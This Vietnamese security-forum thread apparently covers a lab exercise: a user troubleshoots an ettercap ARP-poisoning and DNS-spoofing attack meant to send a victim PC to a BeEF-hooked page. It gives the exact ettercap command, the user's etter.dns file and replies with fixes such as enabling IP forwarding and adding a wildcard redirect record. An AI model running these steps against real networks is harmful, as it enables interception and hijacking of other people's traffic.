Cho em hỏi vài điều về ettercap với

Thien

W-------
06/03/2016
4
25 bài viết
Cho em hỏi vài điều về ettercap với
Em đang thử dùng ettercap để chuyển hướng các máy tính trong mạng LAN (1 máy) sang 1 trang do em tạo ra chứa link beef, nhưng em dùng lệnh
ettercap -T -q -i wlan0 -M ARP -P dns_spoof /IPVictim//
1489939948Ảnh chụp màn hình (51).png


trên máy victim dùng windows 10+avast, khi truy cập web http:// thì không bị chuyển hướng tới trang em muốn mà lỗi không truy cập được luôn (thử nghiệm trên windows 10 mobile cũng thế), còn đối với trang https:// thì không có tác dụng gì.
Cho em hỏi,
Em làm thế có gì sai mà không thực hiện được?
Nếu muốn chuyển hướng tất cả các máy trong mạng cục bộ thì phải làm sao?
Có phải trang https:// không thể chuyển hướng phải không?
Em cảm ơn!
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Bạn thử kiểm tra xem đã set giá trị "ip_forward " trong /proc/sys/net/ipv4/ip_forward giá trị 1 chưa
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
cảm ơn a, e sẽ thử lại
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Không thành công bạn ơi!
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thien;n55724 đã viết:
Không thành công bạn ơi!
Bạn để thiết lập cài đặt mạng trong VMWare là Bridged nhé....
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
DDos;n55725 đã viết:
File dns.etter của bạn là như thế nào?
Bạn để thiết lập cài đặt mạng trong VMWare là Bridged nhé....
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
DDos;n55725 đã viết:
Bạn để thiết lập cài đặt mạng trong VMWare là Bridged nhé....
Em thiết lập như thế mới kết nối được với usb wifi mà
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thien;n55727 đã viết:
Em thiết lập như thế mới kết nối được với usb wifi mà

Windows bạn dùng mạng dây hay không dây thế?
File dns.etter của bạn là gì?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
A xem giup em voi, e sai cho nao!
############################################################################
# #
# ettercap -- etter.dns -- host file for dns_spoof plugin #
# #
# Copyright (C) ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
# #
# Sample hosts file for dns_spoof plugin #
# #
# the format is (for A query): #
# www.myhostname.com A 168.11.22.33 #
# *.foo.com A 168.44.55.66 #
# #
# ... for a AAAA query (same hostname allowed): #
# www.myhostname.com AAAA 2001:db8::1 #
# *.foo.com AAAA 2001:db8::2 #
# #
# or to skip a protocol family (useful with dual-stack): #
# www.hotmail.com AAAA :: #
# www.yahoo.com A 0.0.0.0 #
# #
# or for PTR query: #
# www.bar.com PTR 10.0.0.10 #
# www.google.com PTR ::1 #
# #
# or for MX query (either IPv4 or IPv6): #
# domain.com MX xxx.xxx.xxx.xxx #
# domain2.com MX xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx #
# domain3.com MX xxxx:xxxx::y #
# #
# or for WINS query: #
# workgroup WINS 127.0.0.1 #
# PC* WINS 127.0.0.1 #
# #
# or for SRV query (either IPv4 or IPv6): #
# service._tcp|_udp.domain SRV 192.168.1.10:port #
# service._tcp|_udp.domain SRV [2001:db8::3]:port #
# #
# or for TXT query (value must be wrapped in double quotes): #
# google.com TXT "v=spf1 ip4:192.168.0.3/32 ~all" #
# #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests #
# so if you want to reverse poison you have to specify a plain #
# host. (look at the www.microsoft.com example) #
# #
############################################################################

################################
# microsoft sucks ;)
# redirect it to www.linux.org
#

* A 192.168.0.109
microsoft.com A 107.170.40.56
*.microsoft.com A 107.170.40.56
www.microsoft.com PTR 107.170.40.56 # Wildcards in PTR are not allowed

##########################################
# no one out there can have our domains...
#


www.alor.org A 127.0.0.1
www.naga.org A 127.0.0.1
www.naga.org AAAA 2001:db8::2

##########################################
# dual stack enabled hosts does not make life easy
# force them back to single stack

www.ietf.org A 127.0.0.1
www.ietf.org AAAA ::

www.example.org A 0.0.0.0
www.example.org AAAA ::1

###############################################
# one day we will have our ettercap.org domain
#

www.ettercap.org A 127.0.0.1
www.ettercap-project.org A 127.0.0.1
ettercap.sourceforge.net A 23.235.43.133
www.ettercap.org PTR ::1

###############################################
# some MX examples
#

alor.org MX 127.0.0.1
naga.org MX 127.0.0.1
example.org MX 127.0.0.2
microsoft.com MX 2001:db8::1ce:c01d:bee3

###############################################
# This messes up NetBIOS clients using DNS
# resolutions. I.e. Windows/Samba file sharing.
#

LAB-PC* WINS 127.0.0.1

###############################################
# some service discovery examples

xmpp-server._tcp.jabber.org SRV 192.168.1.10:5269
ldap._udp.mynet.com SRV [2001:db8:c001:beef::1]:389

###############################################
# little example for TXT records
#

naga.org TXT "v=spf1 ip4:192.168.1.2 ip6:2001:db8:d0b1:beef::2 -all"


# vim:ts=8:noexpandtab
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thien Bạn chưa chỉnh sửa file etter.dns phù hợp nên không thực hiện được. Bạn backup lại file ettercap ban đầu với lệnh:
cp etter.dns etter.dns.backup (backup đề sau này có dùng gì tới file gốc thì dễ dàng khôi phục lại)
xóa toàn bộ nội dung của file etter.dns và thêm dòng dưới đây:
* A địa chỉ IP bạn muốn redirect

Lưu và đóng lại.
Chạy ettercap.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
DDos không được anh ơi!
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thien;n55779 đã viết:
DDos không được anh ơi!

Cho mình hỏi là máy bạn muốn chuyển hướng của bạn là dùng mạng dây hay không dây vậy?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
DDos;n55790 đã viết:
Cho mình hỏi là máy bạn muốn chuyển hướng của bạn là dùng mạng dây hay không dây vậy?
Em dùng máy ảo kali chạy usb wifi kết nối mạng và tấn công vào máy thật cũng bắt chung 1 wifi
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thien;n55794 đã viết:
Em dùng máy ảo kali chạy usb wifi kết nối mạng và tấn công vào máy thật cũng bắt chung 1 wifi

bạn có thể ghi lại một video về cách bạn làm được không. Nói thế này mình cũng không biết được là sai sót bước nào...
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
DDos;n55795 đã viết:
bạn có thể ghi lại một video về cách bạn làm được không. Nói thế này mình cũng không biết được là sai sót bước nào...

Anh xem giúp em
[video=youtube_share;ADWWjkCRzlc]https://youtu.be/ADWWjkCRzlc[/video]
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên